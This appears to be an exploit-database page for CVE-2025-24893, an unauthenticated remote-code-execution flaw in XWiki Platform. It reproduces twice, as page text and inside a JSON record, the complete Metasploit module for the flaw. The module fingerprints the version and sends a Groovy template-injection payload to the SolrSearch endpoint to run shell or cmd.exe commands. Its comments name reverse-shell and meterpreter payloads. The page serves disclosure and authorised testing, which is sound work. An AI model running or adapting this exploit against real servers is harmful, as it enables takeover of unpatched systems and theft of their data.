📄 XWiki Platform Remote Code Execution_PACKETSTORM:209041

9.8 / 10

CRITICAL

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Description

This Metasploit module exploits a template injection vulnerability...

Visit Original Source

Basic Information

ID PACKETSTORM:209041

Published Sep 1, 2025 at 00:00

Affected Product

Affected Versions ##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
Rank = ExcellentRanking

include Msf::Exploit::Remote::HttpClient
prepend Msf::Exploit::Remote::AutoCheck

def initialize(info = {})
super(
update_info(
info,
'Name' => 'Remote Code Execution Vulnerability in XWiki Platform (CVE-2025-24893)',
'Description' => %q{
This module exploits a template injection vulnerability in the the XWiki Platform.
XWiki includes a macro called SolrSearch (defined in Main.SolrSearchMacros) that enables full-text search through the embedded Solr engine.
The vulnerability stems from the way this macro evaluates search parameters in Groovy, failing to sanitize or restrict malicious input.

This vulnerability affects XWiki Platform versions >= 5.3-milestone-2 and < 15.10.11, and versions >= 16.0.0-rc-1 and < 16.4.1.
Successful exploitation may result in the remote code execution under the privileges
of the web server, potentially exposing sensitive data or disrupting survey operations.

An attacker can execute arbitrary system commands in the context of the user running the web server.
},
'License' => MSF_LICENSE,
'Author' => [
'Maksim Rogov', # Metasploit Module
'John Kwak' # Vulnerability Discovery
],
'References' => [
['CVE', '2025-24893'],
['URL', 'https://github.com/xwiki/xwiki-platform/security/advisories/GHSA-rr6p-3pfg-562j']
],
'Platform' => ['unix', 'linux', 'win'],
'Arch' => [ARCH_CMD],
'Targets' => [
[
'Unix Command',
{
'Platform' => ['unix', 'linux'],
'Arch' => ARCH_CMD,
'Type' => :unix_cmd,
'DefaultOptions' => {
# On Debian 9 curl is not installed by default
'FETCH_COMMAND' => 'WGET'
}
# Tested with cmd/unix/reverse_bash
# Tested with cmd/linux/http/x64/meterpreter/reverse_tcp
}
],
[
'Windows Command',
{
'Platform' => ['win'],
'Arch' => ARCH_CMD,
'Type' => :win_cmd
# Tested with cmd/windows/http/x64/meterpreter/reverse_tcp
}
],
],
'Payload' => {
'BadChars' => '\\'
},
'DefaultTarget' => 0,
'DisclosureDate' => '2025-02-20',
'Notes' => {
'Stability' => [CRASH_SAFE],
'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK],
'Reliability' => [REPEATABLE_SESSION]
}
)
)

register_options(
[
OptString.new('TARGETURI', [true, 'Path to XWiki', '/']),
]
)
end

def check
print_status('Extracting version...')

res = send_request_cgi(
'uri' => normalize_uri(target_uri.path, '/xwiki/bin/view/Main/'),
'method' => 'GET'
)
return CheckCode::Unknown('No response from target') unless res&.code == 200

version_div = res.get_html_document.at('div[id="xwikiplatformversion"]')
return CheckCode::Safe('Possibly not XWiki or incorrect path (version tag not found)') unless version_div

version_match = version_div.text.match(/XWiki.*?(\d+\.\d+\.\d+)/)
unless version_match
print_error("#{peer} - Unable to extract version number")
return CheckCode::Detected('XWiki detected, but version number missing or unrecognized')
end

version = Rex::Version.new(Regexp.last_match(1).to_s)
print_status("Extracted version: #{version}")

if version.between?(Rex::Version.new('5.3.0'), Rex::Version.new('15.10.10')) ||
version.between?(Rex::Version.new('16.0.0'), Rex::Version.new('16.4.0'))
return CheckCode::Appears("Detected version #{version}, which is vulnerable")
end

return CheckCode::Safe("Version #{version} appears safe")
end

def build_cmd
print_status('Building command for target...')

if target['Type'] == :unix_cmd
cmd_array = "'sh', '-c', '#{payload.encoded}'"
else
cmd_array = "'cmd.exe', '/b', '/q', '/c', '#{payload.encoded}'"
end

print_good('Command successfully built for target')

return "{{async async=false}}{{groovy}}[#{cmd_array}].execute().text{{/groovy}}{{/async}}"
end

def send_payload(cmd)
print_status('Uploading payload...')

vars_get = {
'media' => 'rss',
'text' => cmd
}

send_request_cgi({
'uri' => normalize_uri(target_uri.path, '/xwiki/bin/get/Main/SolrSearch'),
'method' => 'GET',
'vars_get' => vars_get
})
end

def exploit
cmd = build_cmd
send_payload(cmd)
end
end

{
    "lastseen": "2025-09-01T17:02:02",
    "description": "This Metasploit module exploits a template injection vulnerability...",
    "published": "2025-09-01T00:00:00",
    "modified": "2025-09-01T00:00:00",
    "type": "packetstorm",
    "title": "\ud83d\udcc4 XWiki Platform Remote Code Execution",
    "source": "",
    "references": "",
    "id": "PACKETSTORM:209041",
    "bulletinFamily": "exploit",
    "cwe": null,
    "cvelist": [
        "CVE-2025-24893"
    ],
    "sourceData": "##\n    # This module requires Metasploit: https://metasploit.com/download\n    # Current source: https://github.com/rapid7/metasploit-framework\n    ##\n    \n    class MetasploitModule < Msf::Exploit::Remote\n      Rank = ExcellentRanking\n    \n      include Msf::Exploit::Remote::HttpClient\n      prepend Msf::Exploit::Remote::AutoCheck\n    \n      def initialize(info = {})\n        super(\n          update_info(\n            info,\n            'Name' => 'Remote Code Execution Vulnerability in XWiki Platform (CVE-2025-24893)',\n            'Description' => %q{\n              This module exploits a template injection vulnerability in the the XWiki Platform.\n              XWiki includes a macro called SolrSearch (defined in Main.SolrSearchMacros) that enables full-text search through the embedded Solr engine.\n              The vulnerability stems from the way this macro evaluates search parameters in Groovy, failing to sanitize or restrict malicious input.\n    \n              This vulnerability affects XWiki Platform versions >= 5.3-milestone-2 and < 15.10.11, and versions >= 16.0.0-rc-1 and < 16.4.1.\n              Successful exploitation may result in the remote code execution under the privileges\n              of the web server, potentially exposing sensitive data or disrupting survey operations.\n    \n              An attacker can execute arbitrary system commands in the context of the user running the web server.\n            },\n            'License' => MSF_LICENSE,\n            'Author' => [\n              'Maksim Rogov', # Metasploit Module\n              'John Kwak' # Vulnerability Discovery\n            ],\n            'References' => [\n              ['CVE', '2025-24893'],\n              ['URL', 'https://github.com/xwiki/xwiki-platform/security/advisories/GHSA-rr6p-3pfg-562j']\n            ],\n            'Platform' => ['unix', 'linux', 'win'],\n            'Arch' => [ARCH_CMD],\n            'Targets' => [\n              [\n                'Unix Command',\n                {\n                  'Platform' => ['unix', 'linux'],\n                  'Arch' => ARCH_CMD,\n                  'Type' => :unix_cmd,\n                  'DefaultOptions' => {\n                    # On Debian 9 curl is not installed by default\n                    'FETCH_COMMAND' => 'WGET'\n                  }\n                  # Tested with cmd/unix/reverse_bash\n                  # Tested with cmd/linux/http/x64/meterpreter/reverse_tcp\n                }\n              ],\n              [\n                'Windows Command',\n                {\n                  'Platform' => ['win'],\n                  'Arch' => ARCH_CMD,\n                  'Type' => :win_cmd\n                  # Tested with cmd/windows/http/x64/meterpreter/reverse_tcp\n                }\n              ],\n            ],\n            'Payload' => {\n              'BadChars' => '\\\\'\n            },\n            'DefaultTarget' => 0,\n            'DisclosureDate' => '2025-02-20',\n            'Notes' => {\n              'Stability' => [CRASH_SAFE],\n              'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK],\n              'Reliability' => [REPEATABLE_SESSION]\n            }\n          )\n        )\n    \n        register_options(\n          [\n            OptString.new('TARGETURI', [true, 'Path to XWiki', '/']),\n          ]\n        )\n      end\n    \n      def check\n        print_status('Extracting version...')\n    \n        res = send_request_cgi(\n          'uri' => normalize_uri(target_uri.path, '/xwiki/bin/view/Main/'),\n          'method' => 'GET'\n        )\n        return CheckCode::Unknown('No response from target') unless res&.code == 200\n    \n        version_div = res.get_html_document.at('div[id=\"xwikiplatformversion\"]')\n        return CheckCode::Safe('Possibly not XWiki or incorrect path (version tag not found)') unless version_div\n    \n        version_match = version_div.text.match(/XWiki.*?(\\d+\\.\\d+\\.\\d+)/)\n        unless version_match\n          print_error(\"#{peer} - Unable to extract version number\")\n          return CheckCode::Detected('XWiki detected, but version number missing or unrecognized')\n        end\n    \n        version = Rex::Version.new(Regexp.last_match(1).to_s)\n        print_status(\"Extracted version: #{version}\")\n    \n        if version.between?(Rex::Version.new('5.3.0'), Rex::Version.new('15.10.10')) ||\n           version.between?(Rex::Version.new('16.0.0'), Rex::Version.new('16.4.0'))\n          return CheckCode::Appears(\"Detected version #{version}, which is vulnerable\")\n        end\n    \n        return CheckCode::Safe(\"Version #{version} appears safe\")\n      end\n    \n      def build_cmd\n        print_status('Building command for target...')\n    \n        if target['Type'] == :unix_cmd\n          cmd_array = \"'sh', '-c', '#{payload.encoded}'\"\n        else\n          cmd_array = \"'cmd.exe', '/b', '/q', '/c', '#{payload.encoded}'\"\n        end\n    \n        print_good('Command successfully built for target')\n    \n        return \"{{async async=false}}{{groovy}}[#{cmd_array}].execute().text{{/groovy}}{{/async}}\"\n      end\n    \n      def send_payload(cmd)\n        print_status('Uploading payload...')\n    \n        vars_get = {\n          'media' => 'rss',\n          'text' => cmd\n        }\n    \n        send_request_cgi({\n          'uri' => normalize_uri(target_uri.path, '/xwiki/bin/get/Main/SolrSearch'),\n          'method' => 'GET',\n          'vars_get' => vars_get\n        })\n      end\n    \n      def exploit\n        cmd = build_cmd\n        send_payload(cmd)\n      end\n    end",
    "sourceHref": "https://packetstorm.news/download/209041",
    "cvss": {
        "score": 9.8,
        "severity": "CRITICAL",
        "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "version": "3.1"
    },
    "cvss2": [],
    "cvss3": {
        "version": "",
        "vectorString": "",
        "baseScore": 0,
        "baseSeverity": "",
        "attackVector": "",
        "attackComplexity": "",
        "privilegesRequired": "",
        "userInteraction": "",
        "scope": "",
        "confidentialityImpact": "",
        "integrityImpact": "",
        "availabilityImpact": "",
        "cvssV3": {
            "version": "",
            "vectorString": "",
            "baseScore": 0,
            "baseSeverity": "",
            "attackVector": "",
            "attackComplexity": "",
            "privilegesRequired": "",
            "userInteraction": "",
            "scope": "",
            "confidentialityImpact": "",
            "integrityImpact": "",
            "availabilityImpact": ""
        }
    },
    "href": "https://packetstorm.news/files/id/209041/",
    "category_name": "Exploit",
    "post_link": "",
    "product": "",
    "version": "",
    "vendor": "",
    "ai_description": "",
    "ai_severity": "",
    "ai_vendor": "",
    "ai_product": "",
    "ai_version": "",
    "ai_score": 0
}

Description

Basic Information

Affected Product

💭 Join the Security Discussion ❌ Cancel Reply